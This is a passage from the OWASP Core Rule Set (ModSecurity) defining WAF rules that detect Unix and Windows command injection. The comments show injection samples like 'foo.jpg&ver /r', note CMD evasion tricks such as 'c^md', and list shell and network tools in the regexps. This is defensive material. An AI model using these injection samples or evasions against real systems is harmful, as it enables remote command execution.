]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ "id:932105,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Unix Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Windows command injection ] # # This rule detects Windows shell command injections. # If you are not running Windows, it is safe to disable this rule. # # A command injection takes a form such as: # # foo.jpg&ver /r # foo.jpg|ver /r # # The vulnerability exists when an application executes a shell command # without proper input escaping/validation. # # To prevent false positives, we look for a 'starting sequence' that # precedes a command in CMD syntax, such as: ; | & ` # # Anatomy of the regexp: # # 1. Starting tokens # # ; ;cmd # \{ {cmd # \| |cmd # \|\| ||cmd # & &cmd # && &&cmd # \n \ncmd # \r \rcmd # ` `cmd # # 2. Command prefixes # # ( (cmd) # , ,cmd # @ @cmd # ' 'cmd' # " "cmd" # \s spacing+cmd # # 3. Paths # # [\w'\"\./]+/ /path/cmd # [\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\ C:\Program Files\cmd # [\^\.\w '\"/\\\\]*\\\\)?[\"\^]* \\net\share\dir\cmd # # 4. Quoting # # \" "cmd" # \^ ^cmd # # 5. Extension/switches # # \.[\"\^]*\w+ cmd.com, cmd.exe, etc. # /b cmd/h # # An effort is made to combat evasions by CMD syntax; for example, # the following strings are valid: c^md, @cmd, "c"md. ModSecurity # has a t:cmdLine transformation built-in to deal with some of these, # but unfortunately, that transformation replaces ';' characters (so # we cannot match on the start of a command) and '\' characters (so we # have trouble matching paths). This makes the regexp more complex. # # This rule is case-insensitive. # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* # [regexp assembled from util/regexp-assemble/regexp-932110.txt] # (?:\.[\"\^]*\w+)?\b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:m[\"\^]*(?:y[\"\^]*s[\"\^]*q[\"\^]*l(?:[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p(?:[\"\^]*s[\"\^]*l[\"\^]*o[\"\^]*w)?|h[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*h[\"\^]*o[\"\^]*w))?|s[\"\^]*(?:i[\"\^]*(?:n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2|e[\"\^]*x[\"\^]*e[\"\^]*c)|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|g[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*c)|o[\"\^]*(?:u[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|v[\"\^]*o[\"\^]*l)|v[\"\^]*e[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r|[dr][\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*i[\"\^]*n[\"\^]*k)|d[\"\^]*(?:s[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*d|(?:[\s,;]|\.|/|<|>).*)|a[\"\^]*p[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*d|b[\"\^]*s[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*i|e[\"\^]*a[\"\^]*s[\"\^]*u[\"\^]*r[\"\^]*e|m[\"\^]*s[\"\^]*y[\"\^]*s)|d[\"\^]*(?:i[\"\^]*(?:s[\"\^]*k[\"\^]*(?:(?:m[\"\^]*g[\"\^]*m|p[\"\^]*a[\"\^]*r)[\"\^]*t|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|r[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*e)|f[\"\^]*f[\"\^]*(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*(?:l[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*f|t[\"\^]*r[\"\^]*e[\"\^]*e|(?:[\s,;]|\.|/|<|>).*)|v[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c[\"\^]*o[\"\^]*n)|(?:f[\"\^]*r[\"\^]*a|b[\"\^]*u)[\"\^]*g)|s[\"\^]*(?:a[\"\^]*(?:c[\"\^]*l[\"\^]*s|d[\"\^]*d)|q[\"\^]*u[\"\^]*e[\"\^]*r[\"\^]*y|m[\"\^]*o[\"\^]*(?:v[\"\^]*e|d)|g[\"\^]*e[\"\^]*t|r[\"\^]*m)|(?:r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r|o[\"\^]*s[\"\^]*k[\"\^]*e)[\"\^]*y|(?:c[\"\^]*o[\"\^]*m[\"\^]*c[\"\^]*n[\"\^]*f|x[\"\^]*d[\"\^]*i[\"\^]*a)[\"\^]*g|a[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|n[\"\^]*s[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|c[\"\^]*(?:o[\"\^]*(?:m[\"\^]*(?:p[\"\^]*(?:(?:a[\"\^]*c[\"\^]*t[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|m[\"\^]*g[\"\^]*m[\"\^]*t)|e[\"\^]*x[\"\^]*p)|n[\"\^]*(?:2[\"\^]*p|v[\"\^]*e)[\"\^]*r[\"\^]*t|p[\"\^]*y)|l[\"\^]*(?:e[\"\^]*a[\"\^]*(?:n[\"\^]*m[\"\^]*g[\"\^]*r|r[\"\^]*m[\"\^]*e[\"\^]*m)|u[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*r)|h[\"\^]*(?:k[\"\^]*(?:n[\"\^]*t[\"\^]*f[\"\^]*s|d[\"\^]*s[\"\^]*k)|d[\"\^]*i[\"\^]*r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|s[\"\^]*(?:c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|c[\"\^]*m[\"\^]*d)|v[\"\^]*d[\"\^]*e)|e[\"\^]*r[\"\^]*t[\"\^]*(?:u[\"\^]*t[\"\^]*i[\"\^]*l|r[\"\^]*e[\"\^]*q)|a[\"\^]*(?:l[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|c[\"\^]*l[\"\^]*s)|m[\"\^]*d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|i[\"\^]*p[\"\^]*h[\"\^]*e[\"\^]*r|u[\"\^]*r[\"\^]*l)|f[\"\^]*(?:o[\"\^]*r[\"\^]*(?:m[\"\^]*a[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*n[\"\^]*d[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|s[\"\^]*t[\"\^]*r)|s[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*(?:p[\"\^]*(?:[\s,;]|\.|/|<|>).*|y[\"\^]*p[\"\^]*e)|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|c[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*r[\"\^]*e[\"\^]*p)|n[\"\^]*(?:e[\"\^]*t[\"\^]*(?:s[\"\^]*(?:t[\"\^]*a[\"\^]*t|v[\"\^]*c|h)|(?:[\s,;]|\.|/|<|>).*|c[\"\^]*a[\"\^]*t|d[\"\^]*o[\"\^]*m)|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|r[\"\^]*i[\"\^]*g[\"\^]*h[\"\^]*t[\"\^]*s)|(?:s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u|m[\"\^]*a)[\"\^]*p|c[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|a[\"\^]*t)|b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t)|e[\"\^]*(?:x[\"\^]*p[\"\^]*(?:a[\"\^]*n[\"\^]*d[\"\^]*(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*(?:c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e|v[\"\^]*w[\"\^]*r)|n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|g[\"\^]*r[\"\^]*e[\"\^]*p|r[\"\^]*a[\"\^]*s[\"\^]*e|c[\"\^]*h[\"\^]*o)|g[\"\^]*(?:a[\"\^]*t[\"\^]*h[\"\^]*e[\"\^]*r[\"\^]*n[\"\^]*e[\"\^]*t[\"\^]*w[\"\^]*o[\"\^]*r[\"\^]*k[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*(?:(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l|e[\"\^]*d[\"\^]*i)[\"\^]*t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|i[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|e[\"\^]*t[\"\^]*m[\"\^]*a[\"\^]*c)|i[\"\^]*(?:r[\"\^]*b(?:[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))?|f[\"\^]*m[\"\^]*e[\"\^]*m[\"\^]*b[\"\^]*e[\"\^]*r|p[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|n[\"\^]*e[\"\^]*t[\"\^]*c[\"\^]*p[\"\^]*l|c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s)|a[\"\^]*(?:d[\"\^]*(?:d[\"\^]*u[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*s|m[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*m[\"\^]*d)|r[\"\^]*p[\"\^]*(?:[\s,;]|\.|/|<|>).*|t[\"\^]*t[\"\^]*r[\"\^]*i[\"\^]*b|s[\"\^]*s[\"\^]*o[\"\^]*c|z[\"\^]*m[\"\^]*a[\"\^]*n)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*i[\"\^]*m[\"\^]*e|m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f)|a[\"\^]*b[\"\^]*e[\"\^]*l[\"\^]*(?:[\s,;]|\.|/|<|>).*|u[\"\^]*s[\"\^]*r[\"\^]*m[\"\^]*g[\"\^]*r)|b[\"\^]*(?:(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)|r[\"\^]*o[\"\^]*w[\"\^]*s[\"\^]*t[\"\^]*a)[\"\^]*t|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|o[\"\^]*o[\"\^]*t[\"\^]*c[\"\^]*f[\"\^]*g)|h[\"\^]*(?:o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e|d[\"\^]*w[\"\^]*w[\"\^]*i[\"\^]*z)|j[\"\^]*a[\"\^]*v[\"\^]*a[\"\^]*(?:[\s,;]|\.|/|<|>).*|7[\"\^]*z(?:[\"\^]*[ar])?)(?:\.[\"\^]*\w+)?\b" \ "id:932110,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Windows Command Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-windows',\ tag:'attack-rce',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Apache 2.2 requires configuration file lines to be under 8kB. # Therefore, some remaining commands have been split off to a separate rule. # For explanation of this rule, see rule 932110. # # This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: # [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] # # To rebuild the word list regexp: # cd util/regexp-assemble # cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Then insert the assembled regexp into this template: # # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]* # [regexp assembled from util/regexp-assemble/regexp-932110.txt] # (?:\.[\"\^]*\w+)?\b" \ # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:;|\{|\||\|\||&|&&|\n|\r|`)\s*[\(,@\'\"\s]*(?:[\w'\"\./]+/|[\\\\'\"\^]*\w[\\\\'\"\^]*:.*\\\\|[\^\.\w '\"/\\\\]*\\\\)?[\"\^]*(?:s[\"\^]*(?:y[\"\^]*s[\"\^]*(?:t[\"\^]*e[\"\^]*m[\"\^]*(?:p[\"\^]*r[\"\^]*o[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*t[\"\^]*i[\"\^]*e[\"\^]*s[\"\^]*(?:d[\"\^]*a[\"\^]*t[\"\^]*a[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*p[\"\^]*r[\"\^]*e[\"\^]*v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n|(?:p[\"\^]*e[\"\^]*r[\"\^]*f[\"\^]*o[\"\^]*r[\"\^]*m[\"\^]*a[\"\^]*n[\"\^]*c|h[\"\^]*a[\"\^]*r[\"\^]*d[\"\^]*w[\"\^]*a[\"\^]*r)[\"\^]*e|a[\"\^]*d[\"\^]*v[\"\^]*a[\"\^]*n[\"\^]*c[\"\^]*e[\"\^]*d)|i[\"\^]*n[\"\^]*f[\"\^]*o)|k[\"\^]*e[\"\^]*y|d[\"\^]*m)|h[\"\^]*(?:o[\"\^]*(?:w[\"\^]*(?:g[\"\^]*r[\"\^]*p|m[\"\^]*b[\"\^]*r)[\"\^]*s|r[\"\^]*t[\"\^]*c[\"\^]*u[\"\^]*t)|e[\"\^]*l[\"\^]*l[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*a[\"\^]*s|u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|r[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*w|a[\"\^]*r[\"\^]*e|i[\"\^]*f[\"\^]*t)|e[\"\^]*(?:t[\"\^]*(?:(?:x[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l)|c[\"\^]*p[\"\^]*o[\"\^]*l|l[\"\^]*e[\"\^]*c[\"\^]*t)|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|l[\"\^]*i[\"\^]*s[\"\^]*t)|u[\"\^]*b[\"\^]*(?:i[\"\^]*n[\"\^]*a[\"\^]*c[\"\^]*l|s[\"\^]*t)|t[\"\^]*a[\"\^]*r[\"\^]*t[\"\^]*(?:[\s,;]|\.|/|<|>).*|i[\"\^]*g[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f|l[\"\^]*(?:e[\"\^]*e[\"\^]*p|m[\"\^]*g[\"\^]*r)|o[\"\^]*r[\"\^]*t|f[\"\^]*c|v[\"\^]*n)|p[\"\^]*(?:s[\"\^]*(?:s[\"\^]*(?:h[\"\^]*u[\"\^]*t[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n|e[\"\^]*r[\"\^]*v[\"\^]*i[\"\^]*c[\"\^]*e|u[\"\^]*s[\"\^]*p[\"\^]*e[\"\^]*n[\"\^]*d)|l[\"\^]*(?:o[\"\^]*g[\"\^]*(?:g[\"\^]*e[\"\^]*d[\"\^]*o[\"\^]*n|l[\"\^]*i[\"\^]*s[\"\^]*t)|i[\"\^]*s[\"\^]*t)|p[\"\^]*(?:a[\"\^]*s[\"\^]*s[\"\^]*w[\"\^]*d|i[\"\^]*n[\"\^]*g)|g[\"\^]*e[\"\^]*t[\"\^]*s[\"\^]*i[\"\^]*d|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*i[\"\^]*l[\"\^]*e|i[\"\^]*n[\"\^]*f[\"\^]*o|k[\"\^]*i[\"\^]*l[\"\^]*l)|o[\"\^]*(?:w[\"\^]*e[\"\^]*r[\"\^]*(?:s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l(?:[\"\^]*_[\"\^]*i[\"\^]*s[\"\^]*e)?|c[\"\^]*f[\"\^]*g)|r[\"\^]*t[\"\^]*q[\"\^]*r[\"\^]*y|p[\"\^]*d)|r[\"\^]*(?:i[\"\^]*n[\"\^]*t[\"\^]*(?:(?:[\s,;]|\.|/|<|>).*|b[\"\^]*r[\"\^]*m)|n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|m[\"\^]*n[\"\^]*g[\"\^]*r)|o[\"\^]*m[\"\^]*p[\"\^]*t)|a[\"\^]*t[\"\^]*h[\"\^]*(?:p[\"\^]*i[\"\^]*n[\"\^]*g|(?:[\s,;]|\.|/|<|>).*)|e[\"\^]*r[\"\^]*(?:l(?:[\"\^]*(?:s[\"\^]*h|5))?|f[\"\^]*m[\"\^]*o[\"\^]*n)|y[\"\^]*t[\"\^]*h[\"\^]*o[\"\^]*n(?:[\"\^]*(?:3(?:[\"\^]*m)?|2))?|k[\"\^]*g[\"\^]*m[\"\^]*g[\"\^]*r|h[\"\^]*p(?:[\"\^]*[57])?|u[\"\^]*s[\"\^]*h[\"\^]*d|i[\"\^]*n[\"\^]*g)|r[\"\^]*(?:e[\"\^]*(?:(?:p[\"\^]*l[\"\^]*a[\"\^]*c[\"\^]*e|n(?:[\"\^]*a[\"\^]*m[\"\^]*e)?|s[\"\^]*e[\"\^]*t)[\"\^]*(?:[\s,;]|\.|/|<|>).*|g[\"\^]*(?:s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2|e[\"\^]*d[\"\^]*i[\"\^]*t|(?:[\s,;]|\.|/|<|>).*|i[\"\^]*n[\"\^]*i)|c[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c|o[\"\^]*v[\"\^]*e[\"\^]*r)|k[\"\^]*e[\"\^]*y[\"\^]*w[\"\^]*i[\"\^]*z)|u[\"\^]*(?:n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|a[\"\^]*s)|b[\"\^]*y[\"\^]*(?:1(?:[\"\^]*[89])?|2[\"\^]*[012]))|a[\"\^]*(?:s[\"\^]*(?:p[\"\^]*h[\"\^]*o[\"\^]*n[\"\^]*e|d[\"\^]*i[\"\^]*a[\"\^]*l)|r[\"\^]*(?:[\s,;]|\.|/|<|>).*)|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r[\"\^]*)?(?:[\s,;]|\.|/|<|>).*|t[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*r[\"\^]*e)|o[\"\^]*(?:u[\"\^]*t[\"\^]*e[\"\^]*(?:[\s,;]|\.|/|<|>).*|b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)|s[\"\^]*(?:t[\"\^]*r[\"\^]*u[\"\^]*i|y[\"\^]*n[\"\^]*c)|d[\"\^]*(?:[\s,;]|\.|/|<|>).*)|t[\"\^]*(?:a[\"\^]*(?:s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*c[\"\^]*h[\"\^]*d|m[\"\^]*g[\"\^]*r)|k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n)|(?:i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u|p[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*i|e[\"\^]*l[\"\^]*n[\"\^]*e|l[\"\^]*i[\"\^]*s)[\"\^]*t|s[\"\^]*(?:d[\"\^]*i[\"\^]*s[\"\^]*c[\"\^]*o|s[\"\^]*h[\"\^]*u[\"\^]*t[\"\^]*d)[\"\^]*n|y[\"\^]*p[\"\^]*e[\"\^]*(?:p[\"\^]*e[\"\^]*r[\"\^]*f|(?:[\s,;]|\.|/|<|>).*)|r[\"\^]*(?:a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*t|e[\"\^]*e))|w[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*i[\"\^]*f[\"\^]*f|m[\"\^]*s[\"\^]*d[\"\^]*p|v[\"\^]*a[\"\^]*r|r[\"\^]*[ms])|u[\"\^]*(?:a[\"\^]*(?:u[\"\^]*c[\"\^]*l[\"\^]*t|p[\"\^]*p)|s[\"\^]*a)|s[\"\^]*c[\"\^]*(?:r[\"\^]*i[\"\^]*p[\"\^]*t|u[\"\^]*i)|e[\"\^]*v[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|m[\"\^]*i[\"\^]*(?:m[\"\^]*g[\"\^]*m[\"\^]*t|c)|a[\"\^]*i[\"\^]*